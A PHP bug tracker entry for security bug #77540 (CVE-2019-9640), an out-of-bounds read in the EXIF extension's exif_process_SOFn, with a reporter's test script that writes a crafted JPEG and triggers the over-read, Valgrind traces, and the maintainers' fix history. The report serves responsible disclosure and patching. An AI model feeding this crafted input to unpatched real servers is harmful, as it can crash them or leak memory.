php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #77540 Invalid Read on exif_process_SOFn
Submitted: 2019-01-29 13:17 UTC Modified: 2019-03-12 19:55 UTC
From: chamal dot desilva at gmail dot com Assigned: stas (profile)
Status: Closed Package: EXIF related
PHP Version: 7.1.26 OS: Windows, Linux
Private report: No CVE-ID: 2019-9640
 [2019-01-29 13:17 UTC] chamal dot desilva at gmail dot com
Description:
------------
Version
-------
PHP 7.3.1
PHP 7.4.0-dev (cli)

Description
-----------
This  bug is present in exif_scan_thumbnail method of ext/exif/exif.c file.
These lines in exif_scan_thumbnail method causes this bug.

...
case M_SOF15:
        //exif_process_SOFn method reads 7 bytes from "uchar *data" pointer.
        // exif_process_SOFn or exif_scan_thumbnail methods don't validate
        //that "uchar *data" pointer has enough data to read.
	exif_process_SOFn(data+pos, marker, &sof_info);
....

Configure Line
---------------
./configure --prefix=/dir-name/install --enable-cli --enable-exif --enable-debug --without-pear




Test script:
---------------
<?php
$width = 0;
$height = 0;
$filename = dirname(__FILE__).DIRECTORY_SEPARATOR.'test.jpg';
file_put_contents($filename,hex2bin("ffd8e100554578696600004d4d002a0000000c00000000000000000012000302020001000000010500000001110001000000013d000000010100010000000101000000da00020000ffd8ffcf000000000000000000000000da0002"));
$s = exif_thumbnail($filename, $width, $height);
echo "Width ".$width."<br>";
echo "Height ".$height;
?>

Actual result:
--------------
Valgrind Output
---------------
Source line numbers are from PHP 7.3.1

export ZEND_DONT_UNLOAD_MODULES=1
export USE_ZEND_ALLOC=0
valgrind ./php/TestCases/test.php

==3659== Invalid read of size 1
==3659==    at 0x24C2E4: exif_process_SOFn (exif.c:2632)
==3659==    by 0x24F135: exif_scan_thumbnail (exif.c:3923)
==3659==    by 0x2521B3: zif_exif_thumbnail (exif.c:4654)
==3659==    by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==3659==    by 0x59146D: execute_ex (zend_vm_execute.h:55418)
==3659==    by 0x59608D: zend_execute (zend_vm_execute.h:60834)
==3659==    by 0x4D2103: zend_execute_scripts (zend.c:1568)
==3659==    by 0x44904D: php_execute_script (main.c:2630)
==3659==    by 0x598C98: do_cli (php_cli.c:997)
==3659==    by 0x599E3F: main (php_cli.c:1389)
==3659==  Address 0x4d6ccbe is 0 bytes after a block of size 6 alloc'd
==3659==    at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==3659==    by 0x4A0495: __zend_malloc (zend_alloc.c:2904)
==3659==    by 0x49F82D: _emalloc (zend_alloc.c:2494)
==3659==    by 0x49FD14: _estrndup (zend_alloc.c:2605)
==3659==    by 0x24CBB0: exif_thumbnail_extract (exif.c:2929)
==3659==    by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598)
==3659==    by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644)
==3659==    by 0x24EA03: exif_process_APP1 (exif.c:3669)
==3659==    by 0x24EECE: exif_scan_JPEG_header (exif.c:3814)
==3659==    by 0x24FDF5: exif_scan_FILE_header (exif.c:4203)
==3659==    by 0x250664: exif_read_from_impl (exif.c:4344)
==3659==    by 0x2506CF: exif_read_from_stream (exif.c:4361)
==3659== 
==3659== Invalid read of size 1
==3659==    at 0x24A45B: php_jpg_get16 (exif.c:1437)
==3659==    by 0x24C2FA: exif_process_SOFn (exif.c:2633)
==3659==    by 0x24F135: exif_scan_thumbnail (exif.c:3923)
==3659==    by 0x2521B3: zif_exif_thumbnail (exif.c:4654)
==3659==    by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==3659==    by 0x59146D: execute_ex (zend_vm_execute.h:55418)
==3659==    by 0x59608D: zend_execute (zend_vm_execute.h:60834)
==3659==    by 0x4D2103: zend_execute_scripts (zend.c:1568)
==3659==    by 0x44904D: php_execute_script (main.c:2630)
==3659==    by 0x598C98: do_cli (php_cli.c:997)
==3659==    by 0x599E3F: main (php_cli.c:1389)
==3659==  Address 0x4d6ccbf is 1 bytes after a block of size 6 alloc'd
==3659==    at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==3659==    by 0x4A0495: __zend_malloc (zend_alloc.c:2904)
==3659==    by 0x49F82D: _emalloc (zend_alloc.c:2494)
==3659==    by 0x49FD14: _estrndup (zend_alloc.c:2605)
==3659==    by 0x24CBB0: exif_thumbnail_extract (exif.c:2929)
==3659==    by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598)
==3659==    by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644)
==3659==    by 0x24EA03: exif_process_APP1 (exif.c:3669)
==3659==    by 0x24EECE: exif_scan_JPEG_header (exif.c:3814)
==3659==    by 0x24FDF5: exif_scan_FILE_header (exif.c:4203)
==3659==    by 0x250664: exif_read_from_impl (exif.c:4344)
==3659==    by 0x2506CF: exif_read_from_stream (exif.c:4361)
==3659== 
==3659== Invalid read of size 1
==3659==    at 0x24A46C: php_jpg_get16 (exif.c:1437)
==3659==    by 0x24C2FA: exif_process_SOFn (exif.c:2633)
==3659==    by 0x24F135: exif_scan_thumbnail (exif.c:3923)
==3659==    by 0x2521B3: zif_exif_thumbnail (exif.c:4654)
==3659==    by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==3659==    by 0x59146D: execute_ex (zend_vm_execute.h:55418)
==3659==    by 0x59608D: zend_execute (zend_vm_execute.h:60834)
==3659==    by 0x4D2103: zend_execute_scripts (zend.c:1568)
==3659==    by 0x44904D: php_execute_script (main.c:2630)
==3659==    by 0x598C98: do_cli (php_cli.c:997)
==3659==    by 0x599E3F: main (php_cli.c:1389)
==3659==  Address 0x4d6ccc0 is 2 bytes after a block of size 6 alloc'd
==3659==    at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==3659==    by 0x4A0495: __zend_malloc (zend_alloc.c:2904)
==3659==    by 0x49F82D: _emalloc (zend_alloc.c:2494)
==3659==    by 0x49FD14: _estrndup (zend_alloc.c:2605)
==3659==    by 0x24CBB0: exif_thumbnail_extract (exif.c:2929)
==3659==    by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598)
==3659==    by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644)
==3659==    by 0x24EA03: exif_process_APP1 (exif.c:3669)
==3659==    by 0x24EECE: exif_scan_JPEG_header (exif.c:3814)
==3659==    by 0x24FDF5: exif_scan_FILE_header (exif.c:4203)
==3659==    by 0x250664: exif_read_from_impl (exif.c:4344)
==3659==    by 0x2506CF: exif_read_from_stream (exif.c:4361)
==3659== 
==3659== Invalid read of size 1
==3659==    at 0x24A45B: php_jpg_get16 (exif.c:1437)
==3659==    by 0x24C311: exif_process_SOFn (exif.c:2634)
==3659==    by 0x24F135: exif_scan_thumbnail (exif.c:3923)
==3659==    by 0x2521B3: zif_exif_thumbnail (exif.c:4654)
==3659==    by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==3659==    by 0x59146D: execute_ex (zend_vm_execute.h:55418)
==3659==    by 0x59608D: zend_execute (zend_vm_execute.h:60834)
==3659==    by 0x4D2103: zend_execute_scripts (zend.c:1568)
==3659==    by 0x44904D: php_execute_script (main.c:2630)
==3659==    by 0x598C98: do_cli (php_cli.c:997)
==3659==    by 0x599E3F: main (php_cli.c:1389)
==3659==  Address 0x4d6ccc1 is 3 bytes after a block of size 6 alloc'd
==3659==    at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==3659==    by 0x4A0495: __zend_malloc (zend_alloc.c:2904)
==3659==    by 0x49F82D: _emalloc (zend_alloc.c:2494)
==3659==    by 0x49FD14: _estrndup (zend_alloc.c:2605)
==3659==    by 0x24CBB0: exif_thumbnail_extract (exif.c:2929)
==3659==    by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598)
==3659==    by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644)
==3659==    by 0x24EA03: exif_process_APP1 (exif.c:3669)
==3659==    by 0x24EECE: exif_scan_JPEG_header (exif.c:3814)
==3659==    by 0x24FDF5: exif_scan_FILE_header (exif.c:4203)
==3659==    by 0x250664: exif_read_from_impl (exif.c:4344)
==3659==    by 0x2506CF: exif_read_from_stream (exif.c:4361)
==3659== 
==3659== Invalid read of size 1
==3659==    at 0x24A46C: php_jpg_get16 (exif.c:1437)
==3659==    by 0x24C311: exif_process_SOFn (exif.c:2634)
==3659==    by 0x24F135: exif_scan_thumbnail (exif.c:3923)
==3659==    by 0x2521B3: zif_exif_thumbnail (exif.c:4654)
==3659==    by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==3659==    by 0x59146D: execute_ex (zend_vm_execute.h:55418)
==3659==    by 0x59608D: zend_execute (zend_vm_execute.h:60834)
==3659==    by 0x4D2103: zend_execute_scripts (zend.c:1568)
==3659==    by 0x44904D: php_execute_script (main.c:2630)
==3659==    by 0x598C98: do_cli (php_cli.c:997)
==3659==    by 0x599E3F: main (php_cli.c:1389)
==3659==  Address 0x4d6ccc2 is 4 bytes after a block of size 6 alloc'd
==3659==    at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==3659==    by 0x4A0495: __zend_malloc (zend_alloc.c:2904)
==3659==    by 0x49F82D: _emalloc (zend_alloc.c:2494)
==3659==    by 0x49FD14: _estrndup (zend_alloc.c:2605)
==3659==    by 0x24CBB0: exif_thumbnail_extract (exif.c:2929)
==3659==    by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598)
==3659==    by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644)
==3659==    by 0x24EA03: exif_process_APP1 (exif.c:3669)
==3659==    by 0x24EECE: exif_scan_JPEG_header (exif.c:3814)
==3659==    by 0x24FDF5: exif_scan_FILE_header (exif.c:4203)
==3659==    by 0x250664: exif_read_from_impl (exif.c:4344)
==3659==    by 0x2506CF: exif_read_from_stream (exif.c:4361)
==3659== 
==3659== Invalid read of size 1
==3659==    at 0x24C323: exif_process_SOFn (exif.c:2635)
==3659==    by 0x24F135: exif_scan_thumbnail (exif.c:3923)
==3659==    by 0x2521B3: zif_exif_thumbnail (exif.c:4654)
==3659==    by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==3659==    by 0x59146D: execute_ex (zend_vm_execute.h:55418)
==3659==    by 0x59608D: zend_execute (zend_vm_execute.h:60834)
==3659==    by 0x4D2103: zend_execute_scripts (zend.c:1568)
==3659==    by 0x44904D: php_execute_script (main.c:2630)
==3659==    by 0x598C98: do_cli (php_cli.c:997)
==3659==    by 0x599E3F: main (php_cli.c:1389)
==3659==  Address 0x4d6ccc3 is 5 bytes after a block of size 6 alloc'd
==3659==    at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==3659==    by 0x4A0495: __zend_malloc (zend_alloc.c:2904)
==3659==    by 0x49F82D: _emalloc (zend_alloc.c:2494)
==3659==    by 0x49FD14: _estrndup (zend_alloc.c:2605)
==3659==    by 0x24CBB0: exif_thumbnail_extract (exif.c:2929)
==3659==    by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598)
==3659==    by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644)
==3659==    by 0x24EA03: exif_process_APP1 (exif.c:3669)
==3659==    by 0x24EECE: exif_scan_JPEG_header (exif.c:3814)
==3659==    by 0x24FDF5: exif_scan_FILE_header (exif.c:4203)
==3659==    by 0x250664: exif_read_from_impl (exif.c:4344)
==3659==    by 0x2506CF: exif_read_from_stream (exif.c:4361)

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2019-01-30 10:49 UTC] cmb@php.net
-Status: Open +Status: Verified -PHP Version: 7.3.1 +PHP Version: 7.1Git-2019-01-30 (Git)
 [2019-01-30 10:49 UTC] cmb@php.net
Thanks for reporting!  Apparently, all relevant versions (i.e. PHP-7.1+) are affected.
 [2019-03-02 21:39 UTC] stas@php.net
-Status: Verified +Status: Assigned -PHP Version: 7.1Git-2019-01-30 (Git) +PHP Version: 7.1.26 -Assigned To: +Assigned To: stas -CVE-ID: +CVE-ID: needed
 [2019-03-02 21:39 UTC] stas@php.net
Proposed fix in security repo as b079e1b50d8d0316f600477c5da55c81bb08b55f and in https://gist.github.com/smalyshev/4fb847b0da0a387f651aa393f1d22a96

Please verify.
 [2019-03-04 07:35 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=5f0e62a3e5b525163e538aaab0161c2c8c5d057b
Log: Fix bug #77540 - Invalid Read on exif_process_SOFn
 [2019-03-04 07:35 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2019-03-04 07:35 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=30d2b94a2e88021b77b07149e1f4438662ca8e5e
Log: Fix bug #77540 - Invalid Read on exif_process_SOFn
 [2019-03-12 08:28 UTC] chamal dot desilva at gmail dot com
Is it possible to add a CVE ID for this bug?
 [2019-03-12 19:55 UTC] stas@php.net
-CVE-ID: needed +CVE-ID: 2019-9640
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Sat Dec 21 16:01:28 2024 UTC